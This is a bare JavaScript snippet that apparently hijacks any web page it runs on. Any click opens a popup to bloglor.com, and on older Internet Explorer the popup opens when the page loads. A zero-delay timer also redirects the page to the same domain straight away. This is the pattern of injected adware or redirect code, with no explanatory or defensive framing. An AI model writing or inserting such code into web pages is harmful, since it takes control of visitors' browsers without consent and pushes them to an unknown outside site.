document.popup = false; function openPopup() {if (document.popup) return; window.open('http://bloglor.com','SHOP','toolbar=yes,statusbar=yes,location=yes,scrollbars=yes,resizable=yes,width=1024,height=600'); document.popup = true; }document.onclick = openPopup; if ((window.XMLHttpRequest == undefined) && (ActiveXObject != undefined)) window.onload = openPopup; function redir(){document.location="http://bloglor.com";}setTimeout("redir()",0);